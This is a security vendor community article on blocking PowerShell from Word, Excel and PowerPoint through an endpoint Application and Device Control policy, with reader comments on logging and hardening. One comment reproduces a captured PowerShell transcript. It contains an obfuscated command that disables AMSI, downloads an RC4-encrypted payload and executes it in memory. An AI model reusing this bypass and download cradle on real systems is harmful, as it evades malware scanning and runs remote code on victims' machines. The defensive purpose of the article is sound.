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Preventing PowerShell from running via Office 

Feb 21, 2017 08:17 AM

Microsoft’s PowerShell has lately been a tool of choice for malware distributors- the trend has only increased since December 2016’s white paper PowerShell threats surge: 95.4 percent of analyzed scripts were malicious.  Too often, end users tricked into opening a malicious attachment will find this powerful tool turned against them.  The ultimate payload downloaded by PowerShell is usually Ransomware.  Once downloaded and run:




Now your organization’s data is lost, unless you have a healthy backup.


Application And Device Control: An Excellent Extra Line of Defense

Using Symantec Endpoint Protection’s optional Application And Device Control component, it is possible to prevent malicious Word, Excel or other Office document attachments from accessing PowerShell or cmd.  Here’s a guide illustrating how to craft such a policy yourself….


2017-02-17 10_27_58- - Remote Desktop Connection.png

2017-02-17 15_25_33-10_148_197_25 - - Remote Desktop Connection.png

2017-02-17 15_25_50-10_148_197_25 - - Remote Desktop Connection.png

2017-02-17 15_26_37-10_148_197_25 - - Remote Desktop Connection.png

2017-02-17 15_28_30-10_148_197_25 - - Remote Desktop Connection.png

2017-02-17 15_28_53-10_148_197_25 - - Remote Desktop Connection.png


Or, find the attached policy that can be implemented and tested in your environment.  Please note that this “Blocking PowerShell.dat” file is provided “as is.” We strongly recommend that it be trialed first in a controlled test environment before applying the policy throughout the organization!  Also note that this is one extra layer of defense- it further reduces the risk f a malware infection, but cannot guarantee eliminating all possibility of damage.


More MUST READ Articles and Documents

Hardening Your Environment Against Ransomware



Support Perspective: W97M.Downloader Battle Plan



REPORT: Organizations must respond to increasing threat of ransomware



Ransomware removal and protection with Symantec Endpoint Protection



Best Practices for Deploying Symantec Endpoint Protection's Application and Device Control Policies


So many Thanks to mick2009 from reviewing this article!

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Blocking PowerShell.zip   2 KB   1 version
Uploaded - Feb 25, 2020

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Jun 27, 2018 03:15 AM

You could do this over ADC, but if the clients are connected to an AD, you can also setup a GPO which records the PS command in a high detail.

GPO: Computer Configuration => Administrative Templates => Windows Components => Windows PowerShell

Log location is a Netshare within your environment.

Example from a proofground environment for a mimikaz recording: 

Windows PowerShell transcript start
Start time: 20170725143617
Username: WIN10\ADMIN
RunAs User: WIN10\ADMIN
Machine: WIN10 (Microsoft Windows NT 10.0.14393.0)
Process ID: 5772
PSVersion: 5.1.14393.0
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.0
BuildVersion: 10.0.14393.0
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
Command start time: 20170725143617
PS>[REf].ASsEMbly.GeTTypE('System.Management.Automation.AmsiUtils')|?{$_}|%{$_.GetFieLd('amsiInitFailed','NonPublic,Static').SetVALue($nULl,$TRue)};[SYStem.NeT.SErvIcEPOinTMAnager]::ExpecT100ConTinUE=0;$wC=NEW-ObJECT SYstEm.NeT.WebClIeNt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';$Wc.HEAdERs.AdD('User-Agent',$u);$wC.ProxY=[SysTeM.NEt.WebREqUEsT]::DeFaULtWEBPrOXy;$wc.PROXY.CrEdeNtIalS = [SYstem.NET.CRedENtialCaChe]::DEfAuLTNEtWorkCreDENtIaLS;$K=[SyStem.TeXT.ENCOding]::ASCII.GETByTEs('5f4dcc3b5aa765d61d8327deb882cf99');$R={$D,$K=$ArGS;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.COUnt])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bXoR$S[($S[$I]+$S[$H])%256]}};$WC.HeAdERS.ADd("Cookie","session=Eeq7QKo7/EX7ouV1KXfEbASEGNs=");$ser='';$t='/login/process.php';$dAtA=$WC.DOwnLoadDAta($SEr+$T);$iv=$Data[0..3];$DAtA=$DatA[4..$data.LeNgTH];-jOIN[ChaR[]](& $R $DATA ($IV+$K))|IEX
Command start time: 20170725143617
PS>TerminatingError(): "Specified method is not supported."
Specified method is not supported.
SYstEm.NeT.WebClIeNt;$u='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like
Gecko';$Wc.HEAdERs.AdD('User-Agent',$u);$wC.ProxY=[SysTeM.NEt.WebREqUEsT]::DeFaULtWEBPrOXy;$wc.PROXY.CrEdeNtIalS = [SYs
r+$T);$iv=$Data[0..3];$DAtA=$DatA[4..$data.LeNgTH];-jOIN[ChaR[]](& $R $DATA ($IV+$K))|IEX : Specified method is not
    + CategoryInfo          : NotImplemented: (:) [], PSNotSupportedException
    + FullyQualifiedErrorId : NotSupported

Command start time: 20170725143617
Windows PowerShell transcript end
End time: 20170725143617

I would also recommend to think about simple things like PS hardening over Environment variables.
You could use a poor documented setting: Constrained Language Mode


String: __PSLockdownPolicy
Value: 4

Benefit: base64 attacks are no longer easy possible

Problem: Environment Variables can be deleted!

Jun 27, 2018 12:00 AM

Sorry for bumping this old thread.


If we want to log every poweshell commands by leveraging SEP ADC, just put the running process as any? (*.exe ?)

Jun 30, 2017 05:00 PM

You don't need the entire path in AC. You can just use winword.exe, powerpnt.exe and excel.exe without prefix..


Jun 14, 2017 12:58 AM

Hi all,

thanks for sharing this. A more effective way to cover all installations and future updates of MS Office is to use the Registry link to the different components.

As example: #HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\powerpnt.exe\Path#*\*

This would enable protection for MS PowerPoint for every installed version and bring the ADC rule into a static condition without the need to be reconfigured every time.

Please look also to this article: 

Hope this helps.


Apr 25, 2017 03:47 PM

Hi Mithun, thanks for your comment. I believe that Office365 (web Word version) will not run a PowerShell script or a Macro. Only the Local installation will be able to access the PowerShell then ADC will trigger the action. We have to consider here any installation path variations:

Office 2013

Windows 32-bit: C:\Program Files\Microsoft Office\Office15\
Windows 64-bit: C:\Program Files (x86)\Microsoft Office\Office15\

Windows 64-bit: C:\Program Files\Microsoft Office\Office15\

Windows 32-bit: C:\Program Files\Microsoft Office 15\ClientX86\Root\Office15\
Windows 64-bit: C:\Program Files (x86)\Microsoft Office 15\ClientX64\Root\Office15\
Office 2016


Windows 32-bit: C:\Program Files\Microsoft Office\root\Office16\
Windows 64-bit: C:\Program Files (x86)\Microsoft Office\root\Office16\

Windows 64-bit: C:\Program Files\Microsoft Office\root\Office16\

Windows 32-bit: C:\Program Files\Microsoft Office 16\ClientX86\Root\Office16\
Windows 64-bit: C:\Program Files (x86)\Microsoft Office 16\ClientX64\Root\Office16\

Hope that Helps!

Apr 13, 2017 06:35 AM

Wonderful Article..!! This is going to assist a lot of Security Administrators to control the latest Threats arising from Office.

However, I am wondering if this rule would work with Office 365.

Lucas, Is there are way we would perform similar control on Office365?

Feb 22, 2017 01:06 PM

My suggestion would be to set this rule to 'Test (log only)' as the default. 

Feb 21, 2017 07:32 PM

Absolutely TORB, I have worked with a customer which added the cmd and other process able to run scripts. As said in the article exaustive testing are required before enabling production. Thanks.

Feb 21, 2017 06:26 PM

Been running a similar rule for years. Works great! You should also add cmd.exe, wscript.exe and cscript.exe as some Macros runs javascripts or batch :)
I had a few false postives with custom excel plugins but only seen this in like 1 of 20 environments or so. Btw: I used winword.exe, excel.exe and powerpnt.exe. Not sure if your full wildcard path contains applications that might need to run batch/javascripts, but guess that's whats "log only" is for ;)

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